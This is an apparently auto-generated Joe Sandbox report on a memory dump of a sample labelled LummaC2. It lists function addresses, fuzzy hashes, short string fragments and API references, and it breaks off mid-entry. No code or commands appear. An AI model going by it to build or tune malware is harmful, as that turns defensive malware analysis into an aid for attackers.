Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: 968763d2d55f7706d9135c2254a9bfef43bfd45fd5387ff3fb2ffdcc936f6e68
Instruction ID: 82012764b849c9de8c56ad0525e77efe8aa08866cb842b63fc70b6bd1cfe4f5b
Opcode Fuzzy Hash: 968763d2d55f7706d9135c2254a9bfef43bfd45fd5387ff3fb2ffdcc936f6e68
Instruction Fuzzy Hash: 83612476A483049FE324CF65D88075FBBE2EBC5714F09C93CE9949B381C7B488069B92

Function 00EF9820 Relevance: 2.7, Strings: 1, Instructions: 1444COMMON

Download Yara Rule

Strings

gd, xrefs: 00EF9BE3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gd
API String ID: 2994545307-565856990
Opcode ID: c1dd40fdc3ee0b53c703db7c41acb2403d4c15d2e6375b310946fe0f1fc9aec6
Instruction ID: 4cc2976a8430340cd8b9fc21b73d737d2bca846ecd078caeea2c4a8076258b43
Opcode Fuzzy Hash: c1dd40fdc3ee0b53c703db7c41acb2403d4c15d2e6375b310946fe0f1fc9aec6
Instruction Fuzzy Hash: CD9224717093499BE724CF20DC8177BBBE2EBD4348F18942CE6C99B292D6759C46CB42

Function 00EEE465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

c, xrefs: 00EEE46F
{L, xrefs: 00EEE4BD

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: 14919e7798a9383655c0ec6a1de7b76c348d30fc25e837d16059389d9a97fa93
Instruction ID: 09624ce1205609a5d98c59991d134150b2b9c8e474f01106d4fcb64d82803d0c
Opcode Fuzzy Hash: 14919e7798a9383655c0ec6a1de7b76c348d30fc25e837d16059389d9a97fa93
Instruction Fuzzy Hash: 46512172A0C3D08BE725CB24C8517DF7BE3EBE5308F18497CC8C9A7286E6754A468742

Function 00F090B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

5B3@, xrefs: 00F090C2
dV3T, xrefs: 00F090DA

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: e4b8f516a1ae89b34a1d4744414624f745ed8dc4d838f53cc05fb41ff04e7dce
Instruction ID: e934108ba213ea477ab76c0686b4b0892dfdd85a78974b918858bc71239cc5b8
Opcode Fuzzy Hash: e4b8f516a1ae89b34a1d4744414624f745ed8dc4d838f53cc05fb41ff04e7dce
Instruction Fuzzy Hash: 6A31CDB164C3948FD3108F2A884075FFBF6BBD6B04F149A2CE5D59B296D7B4C5028B06

Function 00EED196 Relevance: 2.5, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00EED196
CoUninitialize.OLE32 ref: 00EED1A0

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 6e38e19ba73dfe0e4b2a2ac27d56c151e13920c3e486adedfefd9e53dac9c78c
Instruction ID: cca05a721428b396aa44cd1f9871b389c3855b856392e3d083bd2a24d9459550
Opcode Fuzzy Hash: 6e38e19ba73dfe0e4b2a2ac27d56c151e13920c3e486adedfefd9e53dac9c78c
Instruction Fuzzy Hash: FDC08C70A10089CFC73C8F30ECB8036F7B0F74B38AB802918D903D3221CA289203AA0C

Function 00EF4A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00EF5160

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 8f19def3414a7e23df8fb0ef91555ac8d6edc7ec284fbbb26a39c9c2508b5394
Instruction ID: a4910fe49249901433cc9c7aac94a4d3302a715675db15cd89b6b8b7e99b9690
Opcode Fuzzy Hash: 8f19def3414a7e23df8fb0ef91555ac8d6edc7ec284fbbb26a39c9c2508b5394
Instruction Fuzzy Hash: 37627776A08308DFE7288F24EC5277BB3A1FF95314F14552CEA86672D1E739A902DB41

Function 00F066C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 00F067D6

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: 38562614434a847df3b0e0c9d9131f83ebce24e77848b83c4e7a66e311c264bb
Instruction ID: 09f0fb549ae98920bf852d25b7c58ec2592f43f71b5a18fd4cc7510a0b44cfb6
Opcode Fuzzy Hash: 38562614434a847df3b0e0c9d9131f83ebce24e77848b83c4e7a66e311c264bb
Instruction Fuzzy Hash: E6F177B2A0C3458FD3149F28985126BBBE1EFCA314F08896DF5D58B381D778D806DB92

Function 00F0A3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 00F0A6C1

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: e2b00373cef3fd65b8c420d04a313ff3f859b4b6803b1402714b41e50628ab8b
Instruction ID: 3bdc2481182f8d25cd6334b1c3f2333b267366a191812dce0eb768376bbf5b64
Opcode Fuzzy Hash: e2b00373cef3fd65b8c420d04a313ff3f859b4b6803b1402714b41e50628ab8b
Instruction Fuzzy Hash: 2BF1E371A083419FC728CE28C851A2BBBE5AFC5314F19C96DE899873D2D634DD05F792

Function 00F168A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 00F168AF

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 35bb09da677eefd77a6765ce19384479703aa3ab4cdaaf81ee45e8e5ce1c27e9
Instruction ID: b768ab387d35e53f2d69a09d698313dc4c3d3c952d1b0ab120da24596020158b
Opcode Fuzzy Hash: 35bb09da677eefd77a6765ce19384479703aa3ab4cdaaf81ee45e8e5ce1c27e9
Instruction Fuzzy Hash: B4A1063250D7958FC314DA3894803EABFD29BD6364F188A2CE4D5C72D2D679C98AE742

Function 00EFDC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 00EFDDA6

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: ce0e190910a24568559ba3b7322e99d832aa060fc9711031aaa28e6e9b596d8f
Instruction ID: 418d086b02b9c1316adeb6c3f8befb38831bbfae4d29fb03121fc91895ddd659
Opcode Fuzzy Hash: ce0e190910a24568559ba3b7322e99d832aa060fc9711031aaa28e6e9b596d8f
Instruction Fuzzy Hash: FD711523A5D99447D328893C4C213BABE934BE2330F2ED76DE6B69B3E5D5658C029341

Function 00F0FEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 00F0FFF9

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: f704a9376b715c38bf309e48a5874ff1d8e198a756dcdb91ba7f21ae748ec14c
Instruction ID: 0a0f0864acfc5d06d19eb9e79becc41c4d3ee726821bbb8e61b48e459eb521ec
Opcode Fuzzy Hash: f704a9376b715c38bf309e48a5874ff1d8e198a756dcdb91ba7f21ae748ec14c
Instruction Fuzzy Hash: 9771F523A499D14BD339853C4C213AA7A934BE7330F2DC76DF5F68B3E1D9694885A340

Function 00EFA800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 00EFA8EC

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: a6b6d4fa17f86c715d87188c5e9699efcb138f700eaf414e85f64cb3e7e56d28
Instruction ID: 4af09b786a8b614a866d834597a4f200500740b1e15ed519322535705bcbcab7
Opcode Fuzzy Hash: a6b6d4fa17f86c715d87188c5e9699efcb138f700eaf414e85f64cb3e7e56d28
Instruction Fuzzy Hash: DD613B6520458109CB2CCF3484933377AE7AF54308F1991BFC569CFA97E539C503879A

Function 00F1B813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 00F1B9E3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 609ed85ab918029a1180124f628720239587ae173d13b80159e87c4ac19419d7
Instruction ID: 2fa1a12ca815c0e932e87c9e8a4872b5d54effcf6562455fdbc49569156f37b5
Opcode Fuzzy Hash: 609ed85ab918029a1180124f628720239587ae173d13b80159e87c4ac19419d7
Instruction Fuzzy Hash: 46514771A10A158BCB2CCF38CC6157ABBE2FB5A314318496DC452DB3A2EB399843DB10

Function 00EFAAE0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

2w, xrefs: 00EFAAF0

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2w
API String ID: 0-2669178373
Opcode ID: 32eb01bcf76a7d8c3a62b4156f9602bfab1549981107d08d33c544e171aabb54
Instruction ID: fa18877a5fb474a6811c54f2e0bd6f15446aea38a0eec254a3c5dbfa534b3af7
Opcode Fuzzy Hash: 32eb01bcf76a7d8c3a62b4156f9602bfab1549981107d08d33c544e171aabb54
Instruction Fuzzy Hash: 615126737499994BD338893C4C203B6BA934BE3334B2DD379E6B99B3E5D5654C029342

Function 00F1E8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 00F1E9AB

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: dd90757260a360c41fc9e702ed182d3bcc48245caa8f84a2baaadc43f0374ba3
Instruction ID: ff51933d757a5582a42006236ed29000acdc54992fbc42f886bbd371c94b760b
Opcode Fuzzy Hash: dd90757260a360c41fc9e702ed182d3bcc48245caa8f84a2baaadc43f0374ba3
Instruction Fuzzy Hash: E54122B2A053008BD7288F14CC51BBBB7A2FFC9324F08891CE8C55B291E774A944DB82

Function 00F1DAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 00F1DAF0

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 59af94e6437da28225c4efefe53c6916d908317630c4164ce7bfaa0f84763cc3
Instruction ID: 939c548ef3dde8ac8f9b405158d2c62903266b69b23484964eb437878965214b
Opcode Fuzzy Hash: 59af94e6437da28225c4efefe53c6916d908317630c4164ce7bfaa0f84763cc3
Instruction Fuzzy Hash: 7921EEB25093089FD320CF18D8C06ABB7F6FBC9368F15892CE5C983250D335A945DB52

Function 00F08290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 00F08360

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 5d721a6976de440bea5fe7b60d447ca3c79fe987ee5d3b62db4e271ccf378e0f
Instruction ID: b98e6799c91703ef3464fb846d3904a7e7e5e21b60f00f0965b2c9b34cbaf2cd
Opcode Fuzzy Hash: 5d721a6976de440bea5fe7b60d447ca3c79fe987ee5d3b62db4e271ccf378e0f
Instruction Fuzzy Hash: 6621483665C3505BE324CF659CC1B5BB7F2DBC1700F0AC42CA4D99B2C6C978C80A8752

Function 00F1BC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 00F1BC25, 00F1BC55, 00F1BC71

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 941e2f1752e2bfe65b16a79c3ae98d325d81c4d9a313a9eb400b7fa7450ce539
Instruction ID: 486cd9dae2bd77ffe771f5a15cc74898272fa61a17778e74245370cdba24515b
Opcode Fuzzy Hash: 941e2f1752e2bfe65b16a79c3ae98d325d81c4d9a313a9eb400b7fa7450ce539
Instruction Fuzzy Hash: 80F04420A156548FEBE08E78945A3BE7BE0E716214F202DB8C54DE32D1DD1488814B08

Function 00F1D140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20861a365784bf5ad311e8d3de780131d4cad4f246fc1d11d778d11aac11d920
Instruction ID: cdd7ea25c236f83ed36de27337ea27b1241c68b96a4779f18595097bea951a69
Opcode Fuzzy Hash: 20861a365784bf5ad311e8d3de780131d4cad4f246fc1d11d778d11aac11d920
Instruction Fuzzy Hash: 6622E331A08315CFC718DF28D8906AAB7F2FF8A314F1A85ADD88597361D631AC56DB81

Function 00F1D240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b16e2a4ec886debf48c61f46450d363a38618bee881055ed49631040d081ad2
Instruction ID: 99f85aab3dcd3b960740fdcdd6ad2df182bfed1b5c71438c0dc04e66c1e9abd8
Opcode Fuzzy Hash: 8b16e2a4ec886debf48c61f46450d363a38618bee881055ed49631040d081ad2
Instruction Fuzzy Hash: DE12D232B08315CFC718DF28D8906AAB7E2FF8A314F1A85BDD48597361D631AC56DB81

Function 00EE2F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f0cd781991a80c1d72931a60a5ffb79c7537bf9c2ec1d68cd235b5f18e1f1b
Instruction ID: 2810c9294977ce69a284c15d0ba0a069de074a9d0e730b098fa7babea89649d4
Opcode Fuzzy Hash: c0f0cd781991a80c1d72931a60a5ffb79c7537bf9c2ec1d68cd235b5f18e1f1b
Instruction Fuzzy Hash: 5852E4715083898FCB14CF2AC0846EABBE1FF88318F19996DF89967351D774E949CB81

Function 00EE6660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444544e822d72ee4faec6f3614ad022d263057f9697b3ff6c9e3271795208182
Instruction ID: 451c04818dcd9342d3c932b6278245d5c9fdbb3b885341bf60c540520119c284
Opcode Fuzzy Hash: 444544e822d72ee4faec6f3614ad022d263057f9697b3ff6c9e3271795208182
Instruction Fuzzy Hash: 4B521770A08BC88FE734CF25C4843A7BBE1EB61358F14A82DD5EB16683C379A985C745

Function 00EE7440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

